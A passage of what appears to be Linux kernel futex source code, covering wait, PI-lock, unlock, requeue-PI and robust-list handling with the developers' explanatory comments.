* state is implicit in the state of woken task (see futex_wait_requeue_pi() for
* an example).
*/
static inline void queue_me(struct futex_q *q, struct futex_hash_bucket *hb)
__releases(&hb->lock)
{
__queue_me(q, hb);
spin_unlock(&hb->lock);
}
/**
* unqueue_me() - Remove the futex_q from its futex_hash_bucket
* @q: The futex_q to unqueue
*
* The q->lock_ptr must not be held by the caller. A call to unqueue_me() must
* be paired with exactly one earlier call to queue_me().
*
* Return:
* - 1 - if the futex_q was still queued (and we removed unqueued it);
* - 0 - if the futex_q was already removed by the waking thread
*/
static int unqueue_me(struct futex_q *q)
{
spinlock_t *lock_ptr;
int ret = 0;
/* In the common case we don't take the spinlock, which is nice. */
retry:
/*
* q->lock_ptr can change between this read and the following spin_lock.
* Use READ_ONCE to forbid the compiler from reloading q->lock_ptr and
* optimizing lock_ptr out of the logic below.
*/
lock_ptr = READ_ONCE(q->lock_ptr);
if (lock_ptr != NULL) {
spin_lock(lock_ptr);
/*
* q->lock_ptr can change between reading it and
* spin_lock(), causing us to take the wrong lock. This
* corrects the race condition.
*
* Reasoning goes like this: if we have the wrong lock,
* q->lock_ptr must have changed (maybe several times)
* between reading it and the spin_lock(). It can
* change again after the spin_lock() but only if it was
* already changed before the spin_lock(). It cannot,
* however, change back to the original value. Therefore
* we can detect whether we acquired the correct lock.
*/
if (unlikely(lock_ptr != q->lock_ptr)) {
spin_unlock(lock_ptr);
goto retry;
}
__unqueue_futex(q);
BUG_ON(q->pi_state);
spin_unlock(lock_ptr);
ret = 1;
}
drop_futex_key_refs(&q->key);
return ret;
}
/*
* PI futexes can not be requeued and must remove themself from the
* hash bucket. The hash bucket lock (i.e. lock_ptr) is held on entry
* and dropped here.
*/
static void unqueue_me_pi(struct futex_q *q)
__releases(q->lock_ptr)
{
__unqueue_futex(q);
BUG_ON(!q->pi_state);
put_pi_state(q->pi_state);
q->pi_state = NULL;
spin_unlock(q->lock_ptr);
}
static int fixup_pi_state_owner(u32 __user *uaddr, struct futex_q *q,
struct task_struct *argowner)
{
struct futex_pi_state *pi_state = q->pi_state;
u32 uval, uninitialized_var(curval), newval;
struct task_struct *oldowner, *newowner;
u32 newtid;
int ret;
lockdep_assert_held(q->lock_ptr);
raw_spin_lock_irq(&pi_state->pi_mutex.wait_lock);
oldowner = pi_state->owner;
/* Owner died? */
if (!pi_state->owner)
newtid |= FUTEX_OWNER_DIED;
/*
* We are here because either:
*
* - we stole the lock and pi_state->owner needs updating to reflect
* that (@argowner == current),
*
* or:
*
* - someone stole our lock and we need to fix things to point to the
* new owner (@argowner == NULL).
*
* Either way, we have to replace the TID in the user space variable.
* This must be atomic as we have to preserve the owner died bit here.
*
* Note: We write the user space value _before_ changing the pi_state
* because we can fault here. Imagine swapped out pages or a fork
* that marked all the anonymous memory readonly for cow.
*
* Modifying pi_state _before_ the user space value would leave the
* pi_state in an inconsistent state when we fault here, because we
* need to drop the locks to handle the fault. This might be observed
* in the PID check in lookup_pi_state.
*/
retry:
if (!argowner) {
if (oldowner != current) {
/*
* We raced against a concurrent self; things are
* already fixed up. Nothing to do.
*/
ret = 0;
goto out_unlock;
}
if (__rt_mutex_futex_trylock(&pi_state->pi_mutex)) {
/* We got the lock after all, nothing to fix. */
ret = 0;
goto out_unlock;
}
/*
* Since we just failed the trylock; there must be an owner.
*/
newowner = rt_mutex_owner(&pi_state->pi_mutex);
BUG_ON(!newowner);
} else {
WARN_ON_ONCE(argowner != current);
if (oldowner == current) {
/*
* We raced against a concurrent self; things are
* already fixed up. Nothing to do.
*/
ret = 0;
goto out_unlock;
}
newowner = argowner;
}
newtid = task_pid_vnr(newowner) | FUTEX_WAITERS;
if (get_futex_value_locked(&uval, uaddr))
goto handle_fault;
for (;;) {
newval = (uval & FUTEX_OWNER_DIED) | newtid;
if (cmpxchg_futex_value_locked(&curval, uaddr, uval, newval))
goto handle_fault;
if (curval == uval)
break;
uval = curval;
}
/*
* We fixed up user space. Now we need to fix the pi_state
* itself.
*/
if (pi_state->owner != NULL) {
raw_spin_lock(&pi_state->owner->pi_lock);
WARN_ON(list_empty(&pi_state->list));
list_del_init(&pi_state->list);
raw_spin_unlock(&pi_state->owner->pi_lock);
}
pi_state->owner = newowner;
raw_spin_lock(&newowner->pi_lock);
WARN_ON(!list_empty(&pi_state->list));
list_add(&pi_state->list, &newowner->pi_state_list);
raw_spin_unlock(&newowner->pi_lock);
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
return 0;
/*
* To handle the page fault we need to drop the locks here. That gives
* the other task (either the highest priority waiter itself or the
* task which stole the rtmutex) the chance to try the fixup of the
* pi_state. So once we are back from handling the fault we need to
* check the pi_state after reacquiring the locks and before trying to
* do another fixup. When the fixup has been done already we simply
* return.
*
* Note: we hold both hb->lock and pi_mutex->wait_lock. We can safely
* drop hb->lock since the caller owns the hb -> futex_q relation.
* Dropping the pi_mutex->wait_lock requires the state revalidate.
*/
handle_fault:
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
spin_unlock(q->lock_ptr);
ret = fault_in_user_writeable(uaddr);
spin_lock(q->lock_ptr);
raw_spin_lock_irq(&pi_state->pi_mutex.wait_lock);
/*
* Check if someone else fixed it for us:
*/
if (pi_state->owner != oldowner) {
ret = 0;
goto out_unlock;
}
if (ret)
goto out_unlock;
goto retry;
out_unlock:
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
return ret;
}
static long futex_wait_restart(struct restart_block *restart);
/**
* fixup_owner() - Post lock pi_state and corner case management
* @uaddr: user address of the futex
* @q: futex_q (contains pi_state and access to the rt_mutex)
* @locked: if the attempt to take the rt_mutex succeeded (1) or not (0)
*
* After attempting to lock an rt_mutex, this function is called to cleanup
* the pi_state owner as well as handle race conditions that may allow us to
* acquire the lock. Must be called with the hb lock held.
*
* Return:
* - 1 - success, lock taken;
* - 0 - success, lock not taken;
* - <0 - on error (-EFAULT)
*/
static int fixup_owner(u32 __user *uaddr, struct futex_q *q, int locked)
{
int ret = 0;
if (locked) {
/*
* Got the lock. We might not be the anticipated owner if we
* did a lock-steal - fix up the PI-state in that case:
*
* Speculative pi_state->owner read (we don't hold wait_lock);
* since we own the lock pi_state->owner == current is the
* stable state, anything else needs more attention.
*/
if (q->pi_state->owner != current)
ret = fixup_pi_state_owner(uaddr, q, current);
goto out;
}
/*
* If we didn't get the lock; check if anybody stole it from us. In
* that case, we need to fix up the uval to point to them instead of
* us, otherwise bad things happen. [10]
*
* Another speculative read; pi_state->owner == current is unstable
* but needs our attention.
*/
if (q->pi_state->owner == current) {
ret = fixup_pi_state_owner(uaddr, q, NULL);
goto out;
}
/*
* Paranoia check. If we did not take the lock, then we should not be
* the owner of the rt_mutex.
*/
if (rt_mutex_owner(&q->pi_state->pi_mutex) == current) {
printk(KERN_ERR "fixup_owner: ret = %d pi-mutex: %p "
"pi-state %p\n", ret,
q->pi_state->pi_mutex.owner,
q->pi_state->owner);
}
out:
return ret ? ret : locked;
}
/**
* futex_wait_queue_me() - queue_me() and wait for wakeup, timeout, or signal
* @hb: the futex hash bucket, must be locked by the caller
* @q: the futex_q to queue up on
* @timeout: the prepared hrtimer_sleeper, or null for no timeout
*/
static void futex_wait_queue_me(struct futex_hash_bucket *hb, struct futex_q *q,
struct hrtimer_sleeper *timeout)
{
/*
* The task state is guaranteed to be set before another task can
* wake it. set_current_state() is implemented using smp_store_mb() and
* queue_me() calls spin_unlock() upon completion, both serializing
* access to the hash list and forcing another memory barrier.
*/
set_current_state(TASK_INTERRUPTIBLE);
queue_me(q, hb);
/* Arm the timer */
if (timeout)
hrtimer_start_expires(&timeout->timer, HRTIMER_MODE_ABS);
/*
* If we have been removed from the hash list, then another task
* has tried to wake us, and we can skip the call to schedule().
*/
if (likely(!plist_node_empty(&q->list))) {
/*
* If the timer has already expired, current will already be
* flagged for rescheduling. Only call schedule if there
* is no timeout, or if it has yet to expire.
*/
if (!timeout || timeout->task)
freezable_schedule();
}
__set_current_state(TASK_RUNNING);
}
/**
* futex_wait_setup() - Prepare to wait on a futex
* @uaddr: the futex userspace address
* @val: the expected value
* @flags: futex flags (FLAGS_SHARED, etc.)
* @q: the associated futex_q
* @hb: storage for hash_bucket pointer to be returned to caller
*
* Setup the futex_q and locate the hash_bucket. Get the futex value and
* compare it with the expected value. Handle atomic faults internally.
* Return with the hb lock held and a q.key reference on success, and unlocked
* with no q.key reference on failure.
*
* Return:
* - 0 - uaddr contains val and hb has been locked;
* - <1 - -EFAULT or -EWOULDBLOCK (uaddr does not contain val) and hb is unlocked
*/
static int futex_wait_setup(u32 __user *uaddr, u32 val, unsigned int flags,
struct futex_q *q, struct futex_hash_bucket **hb)
{
u32 uval;
int ret;
/*
* Access the page AFTER the hash-bucket is locked.
* Order is important:
*
* Userspace waiter: val = var; if (cond(val)) futex_wait(&var, val);
* Userspace waker: if (cond(var)) { var = new; futex_wake(&var); }
*
* The basic logical guarantee of a futex is that it blocks ONLY
* if cond(var) is known to be true at the time of blocking, for
* any cond. If we locked the hash-bucket after testing *uaddr, that
* would open a race condition where we could block indefinitely with
* cond(var) false, which would violate the guarantee.
*
* On the other hand, we insert q and release the hash-bucket only
* after testing *uaddr. This guarantees that futex_wait() will NOT
* absorb a wakeup if *uaddr does not match the desired values
* while the syscall executes.
*/
retry:
ret = get_futex_key(uaddr, flags & FLAGS_SHARED, &q->key, VERIFY_READ);
if (unlikely(ret != 0))
return ret;
retry_private:
*hb = queue_lock(q);
ret = get_futex_value_locked(&uval, uaddr);
if (ret) {
queue_unlock(*hb);
ret = get_user(uval, uaddr);
if (ret)
goto out;
if (!(flags & FLAGS_SHARED))
goto retry_private;
put_futex_key(&q->key);
goto retry;
}
if (uval != val) {
queue_unlock(*hb);
ret = -EWOULDBLOCK;
}
out:
if (ret)
put_futex_key(&q->key);
return ret;
}
static int futex_wait(u32 __user *uaddr, unsigned int flags, u32 val,
ktime_t *abs_time, u32 bitset)
{
struct hrtimer_sleeper timeout, *to = NULL;
struct restart_block *restart;
struct futex_hash_bucket *hb;
struct futex_q q = futex_q_init;
int ret;
if (!bitset)
return -EINVAL;
q.bitset = bitset;
if (abs_time) {
to = &timeout;
hrtimer_init_on_stack(&to->timer, (flags & FLAGS_CLOCKRT) ?
CLOCK_REALTIME : CLOCK_MONOTONIC,
HRTIMER_MODE_ABS);
hrtimer_init_sleeper(to, current);
hrtimer_set_expires_range_ns(&to->timer, *abs_time,
current->timer_slack_ns);
}
retry:
/*
* Prepare to wait on uaddr. On success, holds hb lock and increments
* q.key refs.
*/
ret = futex_wait_setup(uaddr, val, flags, &q, &hb);
if (ret)
goto out;
/* queue_me and wait for wakeup, timeout, or a signal. */
futex_wait_queue_me(hb, &q, to);
/* If we were woken (and unqueued), we succeeded, whatever. */
ret = 0;
/* unqueue_me() drops q.key ref */
if (!unqueue_me(&q))
goto out;
ret = -ETIMEDOUT;
if (to && !to->task)
goto out;
/*
* We expect signal_pending(current), but we might be the
* victim of a spurious wakeup as well.
*/
if (!signal_pending(current))
goto retry;
ret = -ERESTARTSYS;
if (!abs_time)
goto out;
restart = ¤t->restart_block;
restart->fn = futex_wait_restart;
restart->futex.uaddr = uaddr;
restart->futex.val = val;
restart->futex.time = *abs_time;
restart->futex.bitset = bitset;
restart->futex.flags = flags | FLAGS_HAS_TIMEOUT;
ret = -ERESTART_RESTARTBLOCK;
out:
if (to) {
hrtimer_cancel(&to->timer);
destroy_hrtimer_on_stack(&to->timer);
}
return ret;
}
static long futex_wait_restart(struct restart_block *restart)
{
u32 __user *uaddr = restart->futex.uaddr;
ktime_t t, *tp = NULL;
if (restart->futex.flags & FLAGS_HAS_TIMEOUT) {
t = restart->futex.time;
tp = &t;
}
restart->fn = do_no_restart_syscall;
return (long)futex_wait(uaddr, restart->futex.flags,
restart->futex.val, tp, restart->futex.bitset);
}
/*
* Userspace tried a 0 -> TID atomic transition of the futex value
* and failed. The kernel side here does the whole locking operation:
* if there are waiters then it will block as a consequence of relying
* on rt-mutexes, it does PI, etc. (Due to races the kernel might see
* a 0 value of the futex too.).
*
* Also serves as futex trylock_pi()'ing, and due semantics.
*/
static int futex_lock_pi(u32 __user *uaddr, unsigned int flags,
ktime_t *time, int trylock)
{
struct hrtimer_sleeper timeout, *to = NULL;
struct futex_pi_state *pi_state = NULL;
struct rt_mutex_waiter rt_waiter;
struct futex_hash_bucket *hb;
struct futex_q q = futex_q_init;
int res, ret;
if (!IS_ENABLED(CONFIG_FUTEX_PI))
return -ENOSYS;
if (refill_pi_state_cache())
return -ENOMEM;
if (time) {
to = &timeout;
hrtimer_init_on_stack(&to->timer, CLOCK_REALTIME,
HRTIMER_MODE_ABS);
hrtimer_init_sleeper(to, current);
hrtimer_set_expires(&to->timer, *time);
}
retry:
ret = get_futex_key(uaddr, flags & FLAGS_SHARED, &q.key, VERIFY_WRITE);
if (unlikely(ret != 0))
goto out;
retry_private:
hb = queue_lock(&q);
ret = futex_lock_pi_atomic(uaddr, hb, &q.key, &q.pi_state, current, 0);
if (unlikely(ret)) {
/*
* Atomic work succeeded and we got the lock,
* or failed. Either way, we do _not_ block.
*/
switch (ret) {
case 1:
/* We got the lock. */
ret = 0;
goto out_unlock_put_key;
case -EFAULT:
goto uaddr_faulted;
case -EAGAIN:
/*
* Two reasons for this:
* - Task is exiting and we just wait for the
* exit to complete.
* - The user space value changed.
*/
queue_unlock(hb);
put_futex_key(&q.key);
cond_resched();
goto retry;
default:
goto out_unlock_put_key;
}
}
WARN_ON(!q.pi_state);
/*
* Only actually queue now that the atomic ops are done:
*/
__queue_me(&q, hb);
if (trylock) {
ret = rt_mutex_futex_trylock(&q.pi_state->pi_mutex);
/* Fixup the trylock return value: */
ret = ret ? 0 : -EWOULDBLOCK;
goto no_block;
}
rt_mutex_init_waiter(&rt_waiter);
/*
* On PREEMPT_RT_FULL, when hb->lock becomes an rt_mutex, we must not
* hold it while doing rt_mutex_start_proxy(), because then it will
* include hb->lock in the blocking chain, even through we'll not in
* fact hold it while blocking. This will lead it to report -EDEADLK
* and BUG when futex_unlock_pi() interleaves with this.
*
* Therefore acquire wait_lock while holding hb->lock, but drop the
* latter before calling rt_mutex_start_proxy_lock(). This still fully
* serializes against futex_unlock_pi() as that does the exact same
* lock handoff sequence.
*/
raw_spin_lock_irq(&q.pi_state->pi_mutex.wait_lock);
spin_unlock(q.lock_ptr);
ret = __rt_mutex_start_proxy_lock(&q.pi_state->pi_mutex, &rt_waiter, current);
raw_spin_unlock_irq(&q.pi_state->pi_mutex.wait_lock);
if (ret) {
if (ret == 1)
ret = 0;
spin_lock(q.lock_ptr);
goto no_block;
}
if (unlikely(to))
hrtimer_start_expires(&to->timer, HRTIMER_MODE_ABS);
ret = rt_mutex_wait_proxy_lock(&q.pi_state->pi_mutex, to, &rt_waiter);
spin_lock(q.lock_ptr);
/*
* If we failed to acquire the lock (signal/timeout), we must
* first acquire the hb->lock before removing the lock from the
* rt_mutex waitqueue, such that we can keep the hb and rt_mutex
* wait lists consistent.
*
* In particular; it is important that futex_unlock_pi() can not
* observe this inconsistency.
*/
if (ret && !rt_mutex_cleanup_proxy_lock(&q.pi_state->pi_mutex, &rt_waiter))
ret = 0;
no_block:
/*
* Fixup the pi_state owner and possibly acquire the lock if we
* haven't already.
*/
res = fixup_owner(uaddr, &q, !ret);
/*
* If fixup_owner() returned an error, proprogate that. If it acquired
* the lock, clear our -ETIMEDOUT or -EINTR.
*/
if (res)
ret = (res < 0) ? res : 0;
/*
* If fixup_owner() faulted and was unable to handle the fault, unlock
* it and return the fault to userspace.
*/
if (ret && (rt_mutex_owner(&q.pi_state->pi_mutex) == current)) {
pi_state = q.pi_state;
get_pi_state(pi_state);
}
/* Unqueue and drop the lock */
unqueue_me_pi(&q);
if (pi_state) {
rt_mutex_futex_unlock(&pi_state->pi_mutex);
put_pi_state(pi_state);
}
goto out_put_key;
out_unlock_put_key:
queue_unlock(hb);
out_put_key:
put_futex_key(&q.key);
out:
if (to) {
hrtimer_cancel(&to->timer);
destroy_hrtimer_on_stack(&to->timer);
}
return ret != -EINTR ? ret : -ERESTARTNOINTR;
uaddr_faulted:
queue_unlock(hb);
ret = fault_in_user_writeable(uaddr);
if (ret)
goto out_put_key;
if (!(flags & FLAGS_SHARED))
goto retry_private;
put_futex_key(&q.key);
goto retry;
}
/*
* Userspace attempted a TID -> 0 atomic transition, and failed.
* This is the in-kernel slowpath: we look up the PI state (if any),
* and do the rt-mutex unlock.
*/
static int futex_unlock_pi(u32 __user *uaddr, unsigned int flags)
{
u32 uninitialized_var(curval), uval, vpid = task_pid_vnr(current);
union futex_key key = FUTEX_KEY_INIT;
struct futex_hash_bucket *hb;
struct futex_q *top_waiter;
int ret;
if (!IS_ENABLED(CONFIG_FUTEX_PI))
return -ENOSYS;
retry:
if (get_user(uval, uaddr))
return -EFAULT;
/*
* We release only a lock we actually own:
*/
if ((uval & FUTEX_TID_MASK) != vpid)
return -EPERM;
ret = get_futex_key(uaddr, flags & FLAGS_SHARED, &key, VERIFY_WRITE);
if (ret)
return ret;
hb = hash_futex(&key);
spin_lock(&hb->lock);
/*
* Check waiters first. We do not trust user space values at
* all and we at least want to know if user space fiddled
* with the futex value instead of blindly unlocking.
*/
top_waiter = futex_top_waiter(hb, &key);
if (top_waiter) {
struct futex_pi_state *pi_state = top_waiter->pi_state;
ret = -EINVAL;
if (!pi_state)
goto out_unlock;
/*
* If current does not own the pi_state then the futex is
* inconsistent and user space fiddled with the futex value.
*/
if (pi_state->owner != current)
goto out_unlock;
get_pi_state(pi_state);
/*
* By taking wait_lock while still holding hb->lock, we ensure
* there is no point where we hold neither; and therefore
* wake_futex_pi() must observe a state consistent with what we
* observed.
*/
raw_spin_lock_irq(&pi_state->pi_mutex.wait_lock);
spin_unlock(&hb->lock);
/* drops pi_state->pi_mutex.wait_lock */
ret = wake_futex_pi(uaddr, uval, pi_state);
put_pi_state(pi_state);
/*
* Success, we're done! No tricky corner cases.
*/
if (!ret)
goto out_putkey;
/*
* The atomic access to the futex value generated a
* pagefault, so retry the user-access and the wakeup:
*/
if (ret == -EFAULT)
goto pi_faulted;
/*
* A unconditional UNLOCK_PI op raced against a waiter
* setting the FUTEX_WAITERS bit. Try again.
*/
if (ret == -EAGAIN) {
put_futex_key(&key);
goto retry;
}
/*
* wake_futex_pi has detected invalid state. Tell user
* space.
*/
goto out_putkey;
}
/*
* We have no kernel internal state, i.e. no waiters in the
* kernel. Waiters which are about to queue themselves are stuck
* on hb->lock. So we can safely ignore them. We do neither
* preserve the WAITERS bit not the OWNER_DIED one. We are the
* owner.
*/
if (cmpxchg_futex_value_locked(&curval, uaddr, uval, 0)) {
spin_unlock(&hb->lock);
goto pi_faulted;
}
/*
* If uval has changed, let user space handle it.
*/
ret = (curval == uval) ? 0 : -EAGAIN;
out_unlock:
spin_unlock(&hb->lock);
out_putkey:
put_futex_key(&key);
return ret;
pi_faulted:
put_futex_key(&key);
ret = fault_in_user_writeable(uaddr);
if (!ret)
goto retry;
return ret;
}
/**
* handle_early_requeue_pi_wakeup() - Detect early wakeup on the initial futex
* @hb: the hash_bucket futex_q was original enqueued on
* @q: the futex_q woken while waiting to be requeued
* @key2: the futex_key of the requeue target futex
* @timeout: the timeout associated with the wait (NULL if none)
*
* Detect if the task was woken on the initial futex as opposed to the requeue
* target futex. If so, determine if it was a timeout or a signal that caused
* the wakeup and return the appropriate error code to the caller. Must be
* called with the hb lock held.
*
* Return:
* - 0 = no early wakeup detected;
* - <0 = -ETIMEDOUT or -ERESTARTNOINTR
*/
static inline
int handle_early_requeue_pi_wakeup(struct futex_hash_bucket *hb,
struct futex_q *q, union futex_key *key2,
struct hrtimer_sleeper *timeout)
{
int ret = 0;
/*
* With the hb lock held, we avoid races while we process the wakeup.
* We only need to hold hb (and not hb2) to ensure atomicity as the
* wakeup code can't change q.key from uaddr to uaddr2 if we hold hb.
* It can't be requeued from uaddr2 to something else since we don't
* support a PI aware source futex for requeue.
*/
if (!match_futex(&q->key, key2)) {
WARN_ON(q->lock_ptr && (&hb->lock != q->lock_ptr));
/*
* We were woken prior to requeue by a timeout or a signal.
* Unqueue the futex_q and determine which it was.
*/
plist_del(&q->list, &hb->chain);
hb_waiters_dec(hb);
/* Handle spurious wakeups gracefully */
ret = -EWOULDBLOCK;
if (timeout && !timeout->task)
ret = -ETIMEDOUT;
else if (signal_pending(current))
ret = -ERESTARTNOINTR;
}
return ret;
}
/**
* futex_wait_requeue_pi() - Wait on uaddr and take uaddr2
* @uaddr: the futex we initially wait on (non-pi)
* @flags: futex flags (FLAGS_SHARED, FLAGS_CLOCKRT, etc.), they must be
* the same type, no requeueing from private to shared, etc.
* @val: the expected value of uaddr
* @abs_time: absolute timeout
* @bitset: 32 bit wakeup bitset set by userspace, defaults to all
* @uaddr2: the pi futex we will take prior to returning to user-space
*
* The caller will wait on uaddr and will be requeued by futex_requeue() to
* uaddr2 which must be PI aware and unique from uaddr. Normal wakeup will wake
* on uaddr2 and complete the acquisition of the rt_mutex prior to returning to
* userspace. This ensures the rt_mutex maintains an owner when it has waiters;
* without one, the pi logic would not know which task to boost/deboost, if
* there was a need to.
*
* We call schedule in futex_wait_queue_me() when we enqueue and return there
* via the following--
* 1) wakeup on uaddr2 after an atomic lock acquisition by futex_requeue()
* 2) wakeup on uaddr2 after a requeue
* 3) signal
* 4) timeout
*
* If 3, cleanup and return -ERESTARTNOINTR.
*
* If 2, we may then block on trying to take the rt_mutex and return via:
* 5) successful lock
* 6) signal
* 7) timeout
* 8) other lock acquisition failure
*
* If 6, return -EWOULDBLOCK (restarting the syscall would do the same).
*
* If 4 or 7, we cleanup and return with -ETIMEDOUT.
*
* Return:
* - 0 - On success;
* - <0 - On error
*/
static int futex_wait_requeue_pi(u32 __user *uaddr, unsigned int flags,
u32 val, ktime_t *abs_time, u32 bitset,
u32 __user *uaddr2)
{
struct hrtimer_sleeper timeout, *to = NULL;
struct futex_pi_state *pi_state = NULL;
struct rt_mutex_waiter rt_waiter;
struct futex_hash_bucket *hb;
union futex_key key2 = FUTEX_KEY_INIT;
struct futex_q q = futex_q_init;
int res, ret;
if (!IS_ENABLED(CONFIG_FUTEX_PI))
return -ENOSYS;
if (uaddr == uaddr2)
return -EINVAL;
if (!bitset)
return -EINVAL;
if (abs_time) {
to = &timeout;
hrtimer_init_on_stack(&to->timer, (flags & FLAGS_CLOCKRT) ?
CLOCK_REALTIME : CLOCK_MONOTONIC,
HRTIMER_MODE_ABS);
hrtimer_init_sleeper(to, current);
hrtimer_set_expires_range_ns(&to->timer, *abs_time,
current->timer_slack_ns);
}
/*
* The waiter is allocated on our stack, manipulated by the requeue
* code while we sleep on uaddr.
*/
rt_mutex_init_waiter(&rt_waiter);
ret = get_futex_key(uaddr2, flags & FLAGS_SHARED, &key2, VERIFY_WRITE);
if (unlikely(ret != 0))
goto out;
q.bitset = bitset;
q.rt_waiter = &rt_waiter;
q.requeue_pi_key = &key2;
/*
* Prepare to wait on uaddr. On success, increments q.key (key1) ref
* count.
*/
ret = futex_wait_setup(uaddr, val, flags, &q, &hb);
if (ret)
goto out_key2;
/*
* The check above which compares uaddrs is not sufficient for
* shared futexes. We need to compare the keys:
*/
if (match_futex(&q.key, &key2)) {
queue_unlock(hb);
ret = -EINVAL;
goto out_put_keys;
}
/* Queue the futex_q, drop the hb lock, wait for wakeup. */
futex_wait_queue_me(hb, &q, to);
spin_lock(&hb->lock);
ret = handle_early_requeue_pi_wakeup(hb, &q, &key2, to);
spin_unlock(&hb->lock);
if (ret)
goto out_put_keys;
/*
* In order for us to be here, we know our q.key == key2, and since
* we took the hb->lock above, we also know that futex_requeue() has
* completed and we no longer have to concern ourselves with a wakeup
* race with the atomic proxy lock acquisition by the requeue code. The
* futex_requeue dropped our key1 reference and incremented our key2
* reference count.
*/
/* Check if the requeue code acquired the second futex for us. */
if (!q.rt_waiter) {
/*
* Got the lock. We might not be the anticipated owner if we
* did a lock-steal - fix up the PI-state in that case.
*/
if (q.pi_state && (q.pi_state->owner != current)) {
spin_lock(q.lock_ptr);
ret = fixup_pi_state_owner(uaddr2, &q, current);
if (ret && rt_mutex_owner(&q.pi_state->pi_mutex) == current) {
pi_state = q.pi_state;
get_pi_state(pi_state);
}
/*
* Drop the reference to the pi state which
* the requeue_pi() code acquired for us.
*/
put_pi_state(q.pi_state);
spin_unlock(q.lock_ptr);
}
} else {
struct rt_mutex *pi_mutex;
/*
* We have been woken up by futex_unlock_pi(), a timeout, or a
* signal. futex_unlock_pi() will not destroy the lock_ptr nor
* the pi_state.
*/
WARN_ON(!q.pi_state);
pi_mutex = &q.pi_state->pi_mutex;
ret = rt_mutex_wait_proxy_lock(pi_mutex, to, &rt_waiter);
spin_lock(q.lock_ptr);
if (ret && !rt_mutex_cleanup_proxy_lock(pi_mutex, &rt_waiter))
ret = 0;
debug_rt_mutex_free_waiter(&rt_waiter);
/*
* Fixup the pi_state owner and possibly acquire the lock if we
* haven't already.
*/
res = fixup_owner(uaddr2, &q, !ret);
/*
* If fixup_owner() returned an error, proprogate that. If it
* acquired the lock, clear -ETIMEDOUT or -EINTR.
*/
if (res)
ret = (res < 0) ? res : 0;
/*
* If fixup_pi_state_owner() faulted and was unable to handle
* the fault, unlock the rt_mutex and return the fault to
* userspace.
*/
if (ret && rt_mutex_owner(&q.pi_state->pi_mutex) == current) {
pi_state = q.pi_state;
get_pi_state(pi_state);
}
/* Unqueue and drop the lock. */
unqueue_me_pi(&q);
}
if (pi_state) {
rt_mutex_futex_unlock(&pi_state->pi_mutex);
put_pi_state(pi_state);
}
if (ret == -EINTR) {
/*
* We've already been requeued, but cannot restart by calling
* futex_lock_pi() directly. We could restart this syscall, but
* it would detect that the user space "val" changed and return
* -EWOULDBLOCK. Save the overhead of the restart and return
* -EWOULDBLOCK directly.
*/
ret = -EWOULDBLOCK;
}
out_put_keys:
put_futex_key(&q.key);
out_key2:
put_futex_key(&key2);
out:
if (to) {
hrtimer_cancel(&to->timer);
destroy_hrtimer_on_stack(&to->timer);
}
return ret;
}
/*
* Support for robust futexes: the kernel cleans up held futexes at
* thread exit time.
*
* Implementation: user-space maintains a per-thread list of locks it
* is holding. Upon do_exit(), the kernel carefully walks this list,
* and marks all locks that are owned by this thread with the
* FUTEX_OWNER_DIED bit, and wakes up a waiter (if any). The list is
* always manipulated with the lock held, so the list is private and
* per-thread. Userspace also maintains a per-thread 'list_op_pending'
* field, to allow the kernel to clean up if the thread dies after
* acquiring the lock, but just before it could have added itself to
* the list. There can only be one such pending lock.
*/
/**
* sys_set_robust_list() - Set the robust-futex list head of a task
* @head: pointer to the list-head
* @len: length of the list-head, as userspace expects
*/
SYSCALL_DEFINE2(set_robust_list, struct robust_list_head __user *, head,
size_t, len)
{
if (!futex_cmpxchg_enabled)
return -ENOSYS;
/*
* The kernel knows only one size for now:
*/
if (unlikely(len != sizeof(*head)))
return -EINVAL;
current->robust_list = head;
return 0;
}
/**
* sys_get_robust_list() - Get the robust-futex list head of a task
* @pid: pid of the process [zero for current task]
* @head_ptr: pointer to a list-head pointer, the kernel fills it in
* @len_ptr: pointer to a length field, the kernel fills in the header size
*/
SYSCALL_DEFINE3(get_robust_list, int, pid,
struct robust_list_head __user * __user *, head_ptr,
size_t __user *, len_ptr)
{
struct robust_list_head __user *head;
unsigned long ret;
struct task_struct *p;
if (!futex_cmpxchg_enabled)
return -ENOSYS;
rcu_read_lock();
ret = -ESRCH;
if (!pid)
p = current;
else {
p = find_task_by_vpid(pid);
if (!p)
goto err_unlock;
}
ret = -EPERM;
if (!ptrace_may_access(p, PTRACE_MODE_READ_REALCREDS))
goto err_unlock;
head = p->robust_list;
rcu_read_unlock();
if (put_user(sizeof(*head), len_ptr))
return -EFAULT;
return put_user(head, head_ptr);
err_unlock:
rcu_read_unlock();
return ret;
}
/*
* Process a futex-list entry, check whether it's owned by the
* dying task, and do notification if so:
*/
int handle_futex_death(u32 __user *uaddr, struct task_struct *curr, int pi)
{
u32 uval, uninitialized_var(nval), mval;
retry:
if (get_user(uval, uaddr))
return -1;
if ((uval & FUTEX_TID_MASK) == task_pid_vnr(curr)) {
/*
* Ok, this dying thread is truly holding a futex
* of interest. Set the OWNER_DIED bit atomically
* via cmpxchg, and if the value had FUTEX_WAITERS
* set, wake up a waiter (if any). (We have to do a
* futex_wake() even if OWNER_DIED is already set -
* to handle the rare but possible case of recursive
* thread-death.) The rest of the cleanup is done in
* userspace.
*/
mval = (uval & FUTEX_WAITERS) | FUTEX_OWNER_DIED;
/*
* We are not holding a lock here, but we want to have
* the pagefault_disable/enable() protection because
* we want to handle the fault gracefully. If the
* access fails we try to fault in the futex with R/W
* verification via get_user_pages. get_user() above
* does not guarantee R/W access. If that fails we
* give up and leave the futex locked.
*/
if (cmpxchg_futex_value_locked(&nval, uaddr, uval, mval)) {
if (fault_in_user_writeable(uaddr))
return -1;
goto retry;
}
if (nval != uval)
goto retry;
/*
* Wake robust non-PI futexes here. The wakeup of
* PI futexes happens in exit_pi_state():
*/
if (!pi && (uval & FUTEX_WAITERS))
futex_wake(uaddr, 1, 1, FUTEX_BITSET_MATCH_ANY);
}
return 0;
}
/*
* Fetch a robust-list pointer. Bit 0 signals PI futexes:
*/
static inline int fetch_robust_entry(struct robust_list __user **entry,
struct robust_list __user * __user *head,
unsigned int *pi)
{
unsigned long uentry;
if (get_user(uentry, (unsigned long __user *)head))
return -EFAULT;
*entry = (void __user *)(uentry & ~1UL);
*pi = uentry & 1;
return 0;
}
/*
* Walk curr->robust_list (very carefully, it's a userspace list!)
* and mark any locks found there dead, and notify any waiters.
*
* We silently return on any sign of list-walking problem.
*/
void exit_robust_list(struct task_struct *curr)
{
struct robust_list_head __user *head = curr->robust_list;
